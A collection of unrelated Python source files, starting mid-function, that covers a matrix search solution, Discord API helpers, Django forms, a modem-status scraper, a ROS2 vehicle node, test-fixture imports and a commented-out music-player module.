col -= 1
else:
return False
# V1'
# https://blog.csdn.net/fuxuemingzhu/article/details/79459314
# https://blog.csdn.net/fuxuemingzhu/article/details/79459200
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
return any(target in row for row in matrix)
# V2
# IDEA : BINARY SEARCH
# Space: O(1)
# Time: O(logm + logn)
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix:
return False
m, n = len(matrix), len(matrix[0])
left, right = 0, m * n
while left < right:
mid = left + (right - left) / 2
if matrix[int(mid / n)][int(mid % n)]>= target:
right = mid
else:
left = mid + 1
return left < m * n and matrix[int(left / n)][int(left % n)] == target
|
from globvar import *
from discordapi import *
def sendMessage(content, channelID, embed=None):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
Possible embed categories: title, description, url, timestamp, color, footer,
image, thumbnail, video, provider, fields.
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Content-Type": "application/json", "Authorization" : token}
data = {"content" : content, "embed" : embed}
r = requests.post(url, headers=header, data=json.dumps(data))
return r.text
def editMessage(content, channelID, messageID):
url = apiBase + "/channels/" + channelID + "/messages/" + messageID
header = {"Content-Type": "application/json", "Authorization" : token}
data = {"content" : content}
r = requests.patch(url, headers=header, data=json.dumps(data))
return r.text
def getGuildID(channelID):
url = apiBase + "/channels/" + channelID
header = {"Content-Type": "application/json", "Authorization" : token}
r = requests.get(url, headers=header)
return json.loads(r.text)['guild_id']
def getPreviousMessage(channelID, messageID):
"""
Get the most recent message sent in a channel.
uses globvar: apiBase, token
content: string
token: string
channelID: string
messageID: string
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
param = {"before" : messageID, "limit" : 1}
r = requests.get(url, headers=header, params=param)
return r.text
def addReaction(reaction, channelID, messageID):
"""
PUT/channels/{channel.id}/messages/{message.id}/reactions/{emoji}/@me
Add one reaction to a message.
reaction: emoji string.
"""
url = apiBase + "/channels/" + channelID + "/messages/" + messageID + "/reactions/" + reaction + "/@me" # %F0%9F%91%8C%F0%9F%8F%BD
header = {"Authorization" : token}
r = requests.put(url, headers=header)
return r.text
def changeUsername(content, channelID):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
data = {"content" : content}
r = requests.post(url, headers=header, data=data)
return r.text
def deleteMessage(channelID, messageID):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
"""
url = apiBase + "/channels/" + channelID + "/messages/" + messageID
header = {"Authorization" : token}
r = requests.delete(url, headers=header)
return r.text
def getMessageJson(channelID):
"""
Get all the messages from the specified channelID in a json
uses globvar: apiBase, token
channelID: string
username: string - optional - Used to find message only from that user. Username is case sensitive.
Returns a list of message informations
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
messageList = []
before = None # Parameter used to get messages beyond the limit.
counter = 0
while True:
counter += 1
params = {"limit" : 100, "before" : before}
r = requests.get(url, headers=header, params=params)
if r.status_code == 429:
print(r.text)
print("ERROR ERROR ERROR ERROR ERROR ERROR")
return "ERROR"
receiveList = json.loads(r.text)
if len(receiveList) == 0 or counter == 10: # If we ran out of messages.
return messageList
messageList += receiveList
before = receiveList[len(receiveList)-1]['id']
|
"""
This file contain form class that get the user input from template to views.
"""
from django import forms
from django.contrib.auth.models import User
from .models import Profile
class ProfileUpdateForm(forms.ModelForm):
"""Form in user's settings page to update image of that user."""
profile_picture = forms.ImageField(required=False, label='Profile Picture')
cover_image = forms.ImageField(required=False, label='Cover Image')
class Meta:
"""Create field that contain profile picture & cover image."""
model = Profile
fields = ['profile_picture', 'cover_image']
class UserUpdateForm(forms.ModelForm):
"""Form in user's settings page to update value in default Django User model."""
email = forms.EmailField(required=False, label='Email')
username = forms.CharField(required=True, label='Username')
class Meta:
"""Create field that contain username & email."""
model = User
fields = ['username', 'email']
|
# Run with:
# python -m rl_games.games.dqn.nac.profile
from typing import Sequence, Tuple
import cProfile
import pstats
import io
from pstats import SortKey
from rl_games.dqn.dqn_player import DqnPlayer
from rl_games.core.play import play_many
from rl_games.core.player import Player
from rl_games.core.game import Game
from rl_games.games.nac import Nac, NacState, NacAction
from rl_games.games.dqn.nac.setup import NacDqnSetup
def get_sample_game_and_trained_players(num_rounds: int = 50, initial_explore_chance: float = 0.25) -> Tuple[Game, Sequence[Player]]:
game = Nac()
players = [
DqnPlayer[NacState, NacAction](game.markers[0], NacDqnSetup(), explore_chance=initial_explore_chance),
DqnPlayer[NacState, NacAction](game.markers[1], NacDqnSetup(), explore_chance=initial_explore_chance),
]
play_many(game, players, range(num_rounds), reduce_explore_chance=True)
return game, players
if __name__ == '__main__':
with cProfile.Profile() as profile:
get_sample_game_and_trained_players()
s = io.StringIO()
sortby = SortKey.CUMULATIVE
ps = pstats.Stats(profile, stream=s).sort_stats(sortby)
ps.print_stats()
print(s.getvalue())
|
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Any, Generator
class AbstractUnitOfWork(ABC):
def __enter__(self) -> AbstractUnitOfWork:
return self
def __exit__(self, *args: Any) -> None:
self.rollback()
def commit(self) -> None:
self._commit()
def rollback(self) -> None:
return self._rollback()
@abstractmethod
def _commit(self) -> None:
raise NotImplementedError
@abstractmethod
def _rollback(self) -> None:
raise NotImplementedError
@abstractmethod
def execute_native_statement(self, statement: str, **params: Any) -> Any:
raise NotImplementedError
@abstractmethod
def collect_new_events(self) -> Generator:
raise NotImplementedError
|
from bs4 import BeautifulSoup
import requests
import config
import time
import mysql.connector
def main():
status_URL = 'http://192.168.100.1/RgConnect.asp'
# log_URL = ''
soup = getSoup(status_URL)
ds_levels, us_levels = getStatus(soup)
insert_into_db('downstream', ds_levels)
insert_into_db('upstream', us_levels)
def getSoup(url):
page = requests.get(url)
soup = BeautifulSoup(page.text, features='html.parser')
return soup
def getStatus(soup):
tables = soup.findAll('table')
downstream_table = tables[2].findAll('tr')[2:]
upstream_table = tables[3].findAll('tr')[2:]
now = int(time.time())
downstream_info = []
for row in downstream_table:
cols = row.findAll('td')
status = cols[1].string.strip()
channel = int(cols[0].string)
frequency = int(cols[4].string[:-4])/1000000
power = float(cols[5].string[:-5])
snr = float(cols[6].string[:-3])
corrected = int(cols[7].string)
uncorrected = int(cols[8].string)
if status == "Locked":
channel_info = { 'id': myHash(now, channel),
'timestamp': now,
'frequency': frequency,
'power': power,
'snr': snr,
'corrected': corrected,
'uncorrected': uncorrected
}
downstream_info.append(channel_info)
upstream_info = []
for row in upstream_table:
cols = row.findAll('td')
status = cols[1].string.strip()
channel = int(cols[0].string)
frequency = float(cols[5].string[:-4])/1000000
power = float(cols[6].string[:-5])
if status == "Locked":
channel_info = { 'id': myHash(now, channel),
'timestamp': now,
'frequency': frequency,
'power': power
}
upstream_info.append(channel_info)
return (downstream_info, upstream_info)
def myHash(timestamp, channel):
ch = str(channel)
if len(ch) < 2:
ch = '0' + ch
key = str(timestamp) + ch
return int(key)
def insert_into_db(table, data):
conn = mysql.connector.connect(**config.mysql)
cursor = conn.cursor()
for entry in data:
placeholders = ', '.join(['%s'] * len(entry))
cols = ', '.join(entry.keys())
sql = f"INSERT INTO {table} ({cols}) VALUES ({placeholders})"
print(sql)
print(entry.values())
try:
cursor.execute(sql, list(entry.values()))
except mysql.connector.Error as err:
print(f"ERROR: {err}")
else:
print("SUCCESS!!")
conn.commit()
cursor.close()
conn.close()
if __name__ == "__main__":
main()
|
"""DSM 6 datas."""
from .const_6_api_auth import DSM_6_AUTH_LOGIN
from .const_6_api_auth import DSM_6_AUTH_LOGIN_2SA
from .const_6_api_auth import DSM_6_AUTH_LOGIN_2SA_OTP
from .const_6_api_info import DSM_6_API_INFO
from .core.const_6_core_security import DSM_6_CORE_SECURITY
from .core.const_6_core_security import DSM_6_CORE_SECURITY_UPDATE_OUTOFDATE
from .core.const_6_core_share import DSM_6_CORE_SHARE
from .core.const_6_core_system import DSM_6_CORE_SYSTEM_DS218_PLAY
from .core.const_6_core_system import DSM_6_CORE_SYSTEM_DS918_PLUS
from .core.const_6_core_upgrade import DSM_6_CORE_UPGRADE_FALSE
from .core.const_6_core_upgrade import DSM_6_CORE_UPGRADE_TRUE
from .core.const_6_core_utilization import DSM_6_CORE_UTILIZATION
from .core.const_6_core_utilization import DSM_6_CORE_UTILIZATION_ERROR_1055
from .download_station.const_6_download_station_info import (
DSM_6_DOWNLOAD_STATION_INFO_CONFIG,
)
from .download_station.const_6_download_station_info import (
DSM_6_DOWNLOAD_STATION_INFO_INFO,
)
from .download_station.const_6_download_station_stat import (
DSM_6_DOWNLOAD_STATION_STAT_INFO,
)
from .download_station.const_6_download_station_task import (
DSM_6_DOWNLOAD_STATION_TASK_LIST,
)
from .dsm.const_6_dsm_info import DSM_6_DSM_INFORMATION
from .dsm.const_6_dsm_network import DSM_6_DSM_NETWORK_2LAN_1PPPOE
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS1515_PLUS_SHR2_10DISKS_1VOL_WITH_EXPANSION,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS1819_PLUS_SHR2_8DISKS_1VOL,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS213_PLUS_SHR1_2DISKS_2VOLS,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS918_PLUS_RAID5_3DISKS_1VOL,
)
from .surveillance_station.const_6_api_info import (
DSM_6_API_INFO as DSM_6_API_INFO_SURVEILLANCE_STATION,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MD_PARAM_SAVE,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MOTION_ENUM,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_GET_LIVE_VIEW_PATH,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_LIST,
)
from .surveillance_station.const_6_surveillance_station_home_mode import (
DSM_6_SURVEILLANCE_STATION_HOME_MODE_GET_INFO,
)
from .surveillance_station.const_6_surveillance_station_home_mode import (
DSM_6_SURVEILLANCE_STATION_HOME_MODE_SWITCH,
)
__all__ = [
"DSM_6_AUTH_LOGIN",
"DSM_6_AUTH_LOGIN_2SA",
"DSM_6_AUTH_LOGIN_2SA_OTP",
"DSM_6_API_INFO",
"DSM_6_CORE_SECURITY",
"DSM_6_CORE_SECURITY_UPDATE_OUTOFDATE",
"DSM_6_CORE_SHARE",
"DSM_6_CORE_SYSTEM_DS218_PLAY",
"DSM_6_CORE_SYSTEM_DS918_PLUS",
"DSM_6_CORE_UPGRADE_FALSE",
"DSM_6_CORE_UPGRADE_TRUE",
"DSM_6_CORE_UTILIZATION",
"DSM_6_CORE_UTILIZATION_ERROR_1055",
"DSM_6_DOWNLOAD_STATION_INFO_CONFIG",
"DSM_6_DOWNLOAD_STATION_INFO_INFO",
"DSM_6_DOWNLOAD_STATION_STAT_INFO",
"DSM_6_DOWNLOAD_STATION_TASK_LIST",
"DSM_6_DSM_INFORMATION",
"DSM_6_DSM_NETWORK_2LAN_1PPPOE",
"DSM_6_STORAGE_STORAGE_DS1515_PLUS_SHR2_10DISKS_1VOL_WITH_EXPANSION",
"DSM_6_STORAGE_STORAGE_DS1819_PLUS_SHR2_8DISKS_1VOL",
"DSM_6_STORAGE_STORAGE_DS213_PLUS_SHR1_2DISKS_2VOLS",
"DSM_6_STORAGE_STORAGE_DS918_PLUS_RAID5_3DISKS_1VOL",
"DSM_6_API_INFO_SURVEILLANCE_STATION",
"DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MD_PARAM_SAVE",
"DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MOTION_ENUM",
"DSM_6_SURVEILLANCE_STATION_CAMERA_GET_LIVE_VIEW_PATH",
"DSM_6_SURVEILLANCE_STATION_CAMERA_LIST",
"DSM_6_SURVEILLANCE_STATION_HOME_MODE_GET_INFO",
"DSM_6_SURVEILLANCE_STATION_HOME_MODE_SWITCH",
]
|
# ROS2 libraries
import rclpy
from rclpy.node import Node
# ROS2 messages
from carla_intersection_msgs.msg import Request, Grant, VehicleCommand
from geometry_msgs.msg import Vector3
# Other libraries
from src.utils import make_coordinate, ROSClock
from src.ros_utils import make_Vector3
from src.vehicle import Vehicle
# Constants
from src.constants import BILLION
class VehicleNode(Node):
def __init__(self):
super().__init__(f"vehicle")
# Parameters declaration
self.declare_parameter('vehicle_id', 0)
self.declare_parameter('initial_velocity', [0.0, 0.0, 0.0])
self.declare_parameter('initial_position', [0.0, 0.0, 0.0])
# State variables initialization
self.vehicle_id = self.get_parameter('vehicle_id').value
self.initial_position = make_coordinate(self.get_parameter('initial_position').value)
self.initial_velocity = make_coordinate(self.get_parameter('initial_velocity').value)
self.asking_for_grant = False
self.vehicle = Vehicle(vehicle_id = self.vehicle_id,
initial_position = self.initial_position,
initial_velocity = self.initial_velocity,
clock = ROSClock(self.get_clock()),
logger = self.get_logger())
# pubsub for input output ports
self.velocity_ = self.create_subscription(Vector3, f"vehicle_velocity_{self.vehicle_id}", self.velocity_callback, 10)
self.position_ = self.create_subscription(Vector3, f"vehicle_position_{self.vehicle_id}", self.position_callback, 10)
self.control_ = self.create_publisher(VehicleCommand, f"control_to_command_{self.vehicle_id}", 10)
self.grant_ = self.create_subscription(Grant, "grant", self.grant_callback, 10)
self.request_ = self.create_publisher(Request, "request", 10)
def position_callback(self, new_position):
self.vehicle.set_position(new_position)
def velocity_callback(self, new_velocity):
pub_packets = self.vehicle.receive_velocity_from_simulator(new_velocity)
if pub_packets.cmd != None:
cmd = VehicleCommand()
cmd.throttle = pub_packets.cmd.throttle
cmd.brake = pub_packets.cmd.brake
self.control_.publish(cmd)
if pub_packets.request != None and not self.asking_for_grant:
request = Request()
request.requestor_id = self.vehicle_id
request.speed = pub_packets.request.speed
request.position = make_Vector3(pub_packets.request.position)
self.request_.publish(request)
self.asking_for_grant = True
def grant_callback(self, grant):
if grant.requestor_id != self.vehicle_id:
return
self.vehicle.grant(grant.arrival_time, grant.intersection_position)
self.asking_for_grant = False
def main(args=None):
rclpy.init(args=args)
ego_vehicle = VehicleNode()
rclpy.spin(ego_vehicle)
# Destroy the node explicitly
ego_vehicle.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
# http://python-social-auth.readthedocs.org/
# https://github.com/python-social-auth/social-examples
from social_core.backends.deezer import DeezerOAuth2
from social_core.backends.utils import load_backends
from configparser import ConfigParser
import re
from social_core.backends.oauth import OAuthAuth
# NAME_RE = re.compile(r'([^O])Auth')
DEEZER_BACKEND_CONFIG = 'social_core.backends.deezer.DeezerOAuth2'
parser = ConfigParser()
parser.read('../config/deezer.ini')
API_KEY = parser.get('DEFAULT', 'apikey')
API_SECRET = parser.get('DEFAULT', 'apisecret')
USERNAME = parser.get('DEFAULT', 'username')
class ConnectDeezer:
def try_to_connect(self):
DeezerOAuth2.start()
pass
# class AppBaseView():
# def render_home(self, **extra):
# context = common_context(
# DEEZER_BACKEND_CONFIG,
# load_strategy(),
# user=self.get_current_user(),
# plus_id=API_KEY,
# **extra
# )
# # return render.home(**context)
#
# def is_authenticated(user):
# if callable(user.is_authenticated):
# return user.is_authenticated()
# else:
# return user.is_authenticated
#
# def associations(user, strategy):
# user_associations = strategy.storage.user.get_social_auth_for_user(user)
# if hasattr(user_associations, 'all'):
# user_associations = user_associations.all()
# return list(user_associations)
#
# def common_context(authentication_backends, strategy, user=None, **extra):
# """Common view context"""
# context = {
# 'user': user,
# 'available_backends': load_backends(authentication_backends),
# 'associated': {}
# }
#
# if user and is_authenticated(user):
# context['associated'] = dict((association.provider, association)
# for association in associations(user, strategy))
#
# return dict(context, **extra)
if __name__ == '__main__':
ConnectDeezer()
|
# TODO: shadow `crowsetta` here?
|
# import pypboy
# import settings
# import pygame
# import os
# import imp
# import glob
# import time
# import game
# from collections import deque
# import mutagen
# import random
# import configparser
# import sys
# import threading
#
# from pypboy.modules.data import entities
# import pypboy.data
#
# song = None
# start_pos = 0
# waveform = []
#
# class Module(pypboy.SubModule):
# label = "RADIO"
#
# def __init__(self, *args, **kwargs):
# super(Module, self).__init__(*args, **kwargs)
#
# self.audiofolders = 'sounds/radio/'
# self.stations = []
# self.station_menu = []
# self.station_list = []
# self.station_waveforms = []
# self.station_list = self.get_station_data()
# self.total_length = 0
# self.station_meta_data_file = None
# self.station_files = []
# self.station_lengths = []
#
# self.grid = Grid()
# self.grid.rect[0] = 400
# self.grid.rect[1] = 180
# self.add(self.grid)
#
# self.animation = Animation()
# self.animation.rect[0] = 400
# self.animation.rect[1] = 190
# self.add(self.animation)
#
# for station in self.station_list:
# # station_data = [station_name, folder, station_files, station_ordered, station_lengths, total_length]
# station_folder = station[1] + "/"
# station_name = station[0]
# self.station_menu.append([station_name])
# self.stations.append(RadioClass(station_name, station_folder, station))
#
# for station in self.stations:
# self.add(station)
# self.active_station = None
# settings.radio = self
#
# stationCallbacks = []
# for i, station in enumerate(self.stations):
# stationCallbacks.append(lambda i=i: self.select_station(i))
#
# # print ("station labels = ",stationLabels)
# # print ("station callbacks = ",stationCallbacks)
#
# self.menu = pypboy.ui.Menu(self.station_menu, stationCallbacks, settings.STATION)
# self.menu.rect[0] = settings.menu_x
# self.menu.rect[1] = settings.menu_y
# self.add(self.menu)
# # self.menu.select(settings.STATION)
#
# self.footer = pypboy.ui.Footer(settings.FOOTER_RADIO)
# self.footer.rect[0] = settings.footer_x
# self.footer.rect[1] = settings.footer_y
# self.add(self.footer)
#
# def select_station(self, station):
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.new_selection = True
# # self.active_station.stop()
# self.active_station = self.stations[station]
# settings.STATION = station
# self.active_station.play_song()
#
# def handle_event(self, event):
# if event.type == settings.EVENTS['SONG_END']:
# if hasattr(self, 'active_station') and self.active_station:
# if self.active_station.new_selection:
# self.active_station.new_selection = False
# else:
# self.active_station.files.rotate(-1)
# self.active_station.song_lengths.rotate(-1)
# self.active_station.play_song()
# self.active_station.new_selection = False
# print("Song ended, Playing next song")
# elif event.type == pygame.KEYDOWN:
# if event.key == pygame.K_PAGEUP:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.volume_up()
# elif event.key == pygame.K_PAGEDOWN:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.volume_down()
# elif event.key == pygame.K_END:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.next_song()
# elif event.key == pygame.K_HOME:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.prev_song()
# elif event.key == pygame.K_DELETE:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.randomize_station()
#
# def get_station_data(self):
#
# # Get list of folders
# folders = []
# stations = []
# self.station_name = None
# self.station_ordered = True
#
# for f in sorted(os.listdir(self.audiofolders)):
# if not f.endswith("/"):
# folders.append(self.audiofolders + f)
#
# for folder in folders:
# config = configparser.SafeConfigParser()
#
# folder_name = os.path.basename(folder) # Get the folder name without the full path
# if len(glob.glob(folder + "/*.ogg")) == 0:
# print("No .ogg files in:", folder)
# continue
#
# song_data = self.load_files(folder)
# self.station_files = song_data[0]
# self.station_lengths = song_data[1]
#
# self.station_meta_data_file = ("./" + folder + "/" + "station.ini")
#
# try:
# assert os.path.exists(self.station_meta_data_file)
# config.read(self.station_meta_data_file, encoding=None)
# except Exception as e:
# print("Error reading the following:", str(e))
#
# try:
# self.station_name = config.get('metadata', 'station_name')
# self.station_ordered = config.get('metadata', 'ordered')
# except Exception as e:
# self.station_name = folder_name
# self.station_ordered = True
# print(str(e), ' could not read configuration file')
# if not settings.do_not_use_cache:
# try:
# print("Loaded cached waveforms in file", self.station_meta_data_file)
# self.station_waveforms = config.get('cache', 'waveforms')
# except Exception as e:
# self.station_waveforms = []
# print(str(e), ' No cache section in', self.station_meta_data_file)
# else:
# print("Using live waveform generation")
# self.station_waveforms = []
#
# self.total_length = sum(self.station_lengths)
#
# if not self.station_waveforms and not settings.do_not_use_cache or settings.force_caching: # Write cached data
# self.station_waveforms = self.process_waveforms(folder)
# print("Writing cache data to ", self.station_meta_data_file)
# try:
# config.add_section("metadata")
# config.set("metadata", "station_name", str(self.station_name))
# config.set("metadata", "ordered", str(self.station_ordered))
# except Exception as e:
# print(str(e))
# try:
# config.add_section("cache")
# except Exception as e:
# print(str(e))
# config.set("cache", "waveforms", str(self.station_waveforms))
# with open(self.station_meta_data_file, 'w') as configfile:
# config.write(configfile)
#
# if not self.station_ordered:
# seed = random.random()
# random.Random(seed).shuffle(self.station_files)
# random.Random(seed).shuffle(self.station_lengths)
# random.Random(seed).shuffle(self.station_waveforms)
#
# station_data = self.station_name, folder, self.station_files, self.station_ordered, self.station_lengths, self.total_length, self.station_waveforms
# stations.append(station_data)
#
# return stations
#
#
# def process_waveforms(self, folder):
# print("started processing waveforms in folder", folder, "this may take a while")
# now = time.time()
# waveforms = []
# for file in sorted(os.listdir(folder)):
# if file.endswith(".ogg"):
# print("Processing waveforms for file = ", file)
# frame_skip = int(48000 / 75) # sample rate / (25 fps * 3 pixels shift per frame)
# amplitude = pygame.sndarray.array(
# pygame.mixer.Sound("./" + folder + "/" + file)) # Load the sound file)
# amplitude = amplitude[:, 0] + amplitude[:, 1]
#
# amplitude = amplitude[::frame_skip]
# # frequency = list(abs(fft.fft(amplitude)))
#
# # scale the amplitude to 1/4th of the frame height and translate it to height/2(central line)
# max_amplitude = max(amplitude)
# for i in range(len(amplitude)):
# amplitude[i] = float(amplitude[i]) / max_amplitude * 100 + 125
#
# waveform = [125] * 250 + list(amplitude)
# for x in range(125): # Add end frames
# waveform.append(125)
# waveforms.append(waveform)
# print("Finished processing waveforms in folder", folder, "Time:", time.time() - now)
# return waveforms
#
# def load_files(self, folder):
# files = []
# song_lengths = []
#
# for file in sorted(os.listdir(folder)):
# if file.endswith(".ogg"):
# files.append("./" + folder + "/" + file)
# song_lengths.append(mutagen.File("./" + folder + "/" + file).info.length)
#
# return [files, song_lengths]
#
#
# class Animation(game.Entity):
#
# def __init__(self):
# super(Animation, self).__init__()
#
# self.width, self.height = 250, 250
# self.center = [self.width / 2, self.height / 2]
# self.image = pygame.Surface((self.width, self.height))
# self.animation_time = 0.04 # 25 fps
# self.prev_time = 0
# self.index = 0
# self.prev_song = None
#
# def render(self, *args, **kwargs):
# global waveform
# self.current_time = time.time()
# self.delta_time = self.current_time - self.prev_time
#
# if self.delta_time >= self.animation_time:
# self.prev_time = self.current_time
#
# if not song:
# self.image.fill((0, 0, 0))
# pygame.draw.line(self.image, [0, 255, 0], [0, self.height / 2], [self.width, self.height / 2], 2)
#
# elif song:
# self.image.fill((0, 0, 0))
# self.index += 3
#
# if song != self.prev_song:
# self.prev_song = song
#
# if waveform:
# print("Loading cached waveform for", song, "Waveform length =", len(waveform))
# else:
# print("Generating waveform from", song, "Waveform length =", len(waveform))
# frame_skip = int(48000 / 75)
# amplitude = pygame.sndarray.array(pygame.mixer.Sound(song)) # Load the sound file)
# amplitude = amplitude[:, 0] + amplitude[:, 1]
#
# amplitude = amplitude[::frame_skip]
#
# # scale the amplitude to 1/4th of the frame height and translate it to height/2(central line)
# max_amplitude = max(amplitude)
# for i in range(len(amplitude)):
# amplitude[i] = float(amplitude[i]) / max_amplitude * int(
# self.height / 2.5) + self.height / 2
#
# waveform = [int(self.height / 2)] * self.width + list(amplitude)
# for x in range(125): # Add end frames
# waveform.append(125)
#
# # print("new start position = ",settings.START_POS)
# if not start_pos == 0:
# self.index = int(start_pos * 75) # Adjust for new start position
# else:
# self.index = 5
# # print("New index=", self.index)
# length = len(waveform)
# if self.index >= length - 5:
# self.index = 0
#
# if length > 0:
# prev_x, prev_y = 0, waveform[self.index]
# for x, y in enumerate(waveform[self.index + 1:self.index + 1 + self.width][::1]):
# pygame.draw.line(self.image, [0, 255, 0], [prev_x, prev_y], [x, y], 2)
# prev_x, prev_y = x, y
#
# # Credit to https://github.com/prtx/Music-Visualizer-in-Python/blob/master/music_visualizer.py
#
#
# class Grid(game.Entity):
#
# def __init__(self):
# super(Grid, self).__init__()
#
# self.image = pygame.Surface((270, 270))
# self.image.fill((0, 0, 0))
# long_line = 14
# long_lines = 10
# short_line = 9
# short_lines = long_lines * 3
# line_start = 0
# bottom = self.image.get_rect().bottom
# right = self.image.get_rect().right
#
# pygame.draw.lines(self.image, settings.light, False, [(0, 268), (268, 268), (268, 0)], 3)
#
# line_x = int(self.image.get_rect().height / long_lines)
# while long_lines >= 1:
# line_start += line_x
# pygame.draw.line(self.image, settings.light, (line_start, bottom), (line_start, bottom - long_line), 2)
# pygame.draw.line(self.image, settings.light, (right, line_start), (right - long_line, line_start), 2)
# long_lines -= 1
#
# line_start = 0
# line_x = int(self.image.get_rect().height / short_lines)
# while short_lines > 2:
# line_start += line_x
# pygame.draw.line(self.image, settings.light, (line_start, bottom), (line_start, bottom - short_line), 2)
# pygame.draw.line(self.image, settings.light, (right, line_start), (right - short_line, line_start), 2)
# short_lines -= 1
#
#
# class RadioStation(game.Entity):
# STATES = {
# 'stopped': 0,
# 'playing': 1,
# 'paused': 2
# }
#
# def __init__(self, *args, **kwargs):
# super(RadioStation, self).__init__((10, 10), *args, **kwargs)
# self.state = self.STATES['stopped']
#
# self.station_length = 0
# self.filename = 0
# # self.files = deque([])
# # self.files = self.load_files()
# self.new_selection = True
# self.last_filename = None
# self.start_time = time.time()
#
# pygame.mixer.music.set_endevent(settings.EVENTS['SONG_END'])
#
# def play_song(self):
# global song, start_pos, waveform
# self.start_pos = 0
# if settings.SOUND_ENABLED:
# if self.files[0].endswith("Silence.ogg"):
# settings.AMPLITUDE = []
# song = None
# start_pos = 0
# waveform = []
# settings.FOOTER_RADIO[0] = ""
#
# print("Radio off")
# self.stop()
# else:
# if hasattr(self, 'last_filename') and self.last_filename: # Support resuming
# self.start_pos = self.last_playpos + (time.time() - self.last_playtime)
# print("Resuming song:", self.last_filename)
#
# if self.files:
# if self.new_selection: # If changed stations manually
# song_length = self.song_lengths[0] # length of the current song
# self.start_pos = time.time() - self.start_time
# # print("time based start_pos =", self.start_pos)
#
# if self.start_pos > song_length:
# i = 0
# lengths = list(self.song_lengths)
# if self.start_pos > self.station_length:
# print("start_pos longer than station length", self.start_pos, self.station_length)
# self.start_time = time.time()
# self.start_pos = 0
# else:
# # Find where in the station list we should be base on current time
# while sum(lengths[0:i]) <= self.start_pos:
# i += 1
# self.files.rotate(-1)
# self.song_lengths.rotate(-1)
# if self.waveforms:
# self.waveforms.rotate(-1)
#
# i -= 1 # compensate for overshoot
# self.files.rotate(1)
# self.song_lengths.rotate(1)
# if self.waveforms:
# self.waveforms.rotate(1)
#
# self.sum_of_song_lengths = sum(lengths[0:i])
# self.start_pos = self.start_pos - self.sum_of_song_lengths
# self.start_time = time.time() - self.start_pos
# print("Jumping to song index: :", i,
# "New Song Length =", lengths[i],
# "start_pos =", self.start_pos,
# "self.sum_of_song_lengths", self.sum_of_song_lengths
# )
#
# self.new_selection = False
#
# else:
# # print("Same station, new song")
# self.start_pos = 0
# if self.waveforms:
# self.waveforms.rotate(1)
#
# self.filename = self.files[0]
#
#
# song = self.filename
# start_pos = self.start_pos
#
# if self.waveforms:
# waveform = self.waveforms[0]
#
# print("Playing =", self.filename,
# "length =", str(round(self.song_lengths[0], 2)),
# "start_pos =", str(round(self.start_pos, 2))
# )
# song_meta_data = mutagen.File(self.filename, easy=True)
# print (song_meta_data)
# song_artist = str(song_meta_data['artist'])
# song_title = str(song_meta_data['title'])
# song_title = song_title.strip("['").strip("']")
# song_artist = song_artist.strip("['").strip("']")
#
# settings.FOOTER_RADIO[0] = song_artist + " / " + song_title
# pygame.mixer.music.load(self.filename)
# pygame.mixer.music.play(0, self.start_pos)
# self.state = self.STATES['playing']
#
# def volume_up(self):
# if settings.SOUND_ENABLED:
# print("Volume up")
# settings.VOLUME = settings.VOLUME + 0.1
# pygame.mixer.music.set_volume(settings.VOLUME)
#
# def volume_down(self):
# if settings.SOUND_ENABLED:
# print("Volume down")
# settings.VOLUME = settings.VOLUME - 0.1
# pygame.mixer.music.set_volume(settings.VOLUME)
#
# def play(self):
# if settings.SOUND_ENABLED:
# if self.state == self.STATES['paused']:
# pygame.mixer.music.unpause()
# self.state = self.STATES['playing']
# else:
# self.play_song()
# print("Music resumed")
#
# def pause(self):
# if settings.SOUND_ENABLED:
# self.state = self.STATES['paused']
# pygame.mixer.music.pause()
# settings.ACTIVE_SONG = None
# print("Music paused")
#
# def stop(self):
# if settings.SOUND_ENABLED:
# self.state = self.STATES['stopped']
# if self.filename:
# self.last_filename = self.filename
# self.last_playpos = pygame.mixer.music.get_pos()
# self.last_playtime = time.time()
# settings.ACTIVE_SONG = None
# pygame.mixer.music.stop()
# print("Music stopped")
#
# def next_song(self):
# if settings.SOUND_ENABLED:
# print("Next song")
# self.files.rotate(-1)
# self.song_lengths.rotate(-1)
# if self.waveforms:
# self.waveforms.rotate(-1)
# self.start_time = time.time()
# self.play_song()
#
# def prev_song(self):
# if settings.SOUND_ENABLED:
# print("Prev song")
# self.files.rotate(1)
# self.song_lengths.rotate(1)
# if self.waveforms:
# self.waveforms.rotate(1)
# self.start_time = time.time()
# self.play_song()
#
# def randomize_station(self):
# seed = random.random()
# random.Random(seed).shuffle(self.files)
# random.Random(seed).shuffle(self.song_lengths)
# print("Randomized song order")
#
# def __le__(self, other):
# if type(other) is not RadioStation:
# return 0
